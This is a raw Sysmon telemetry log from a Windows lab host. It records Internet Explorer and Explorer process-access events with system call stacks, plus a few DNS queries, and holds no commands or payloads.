Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.444{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.428{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.428{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.678{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.647{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.647{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.647{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 
22542200x800000000000000013646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:14.885{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.16.217.172.in-addr.arpa.0type: 12 fra16s08-in-f200.1e100.net;type: 12 fra16s08-in-f8.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.397{59A5CD1D-9410-6005-0E05-00000000A301}6584www.googletagmanager.com0type: 5 www-googletagmanager.l.google.com;::ffff:172.217.16.200;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
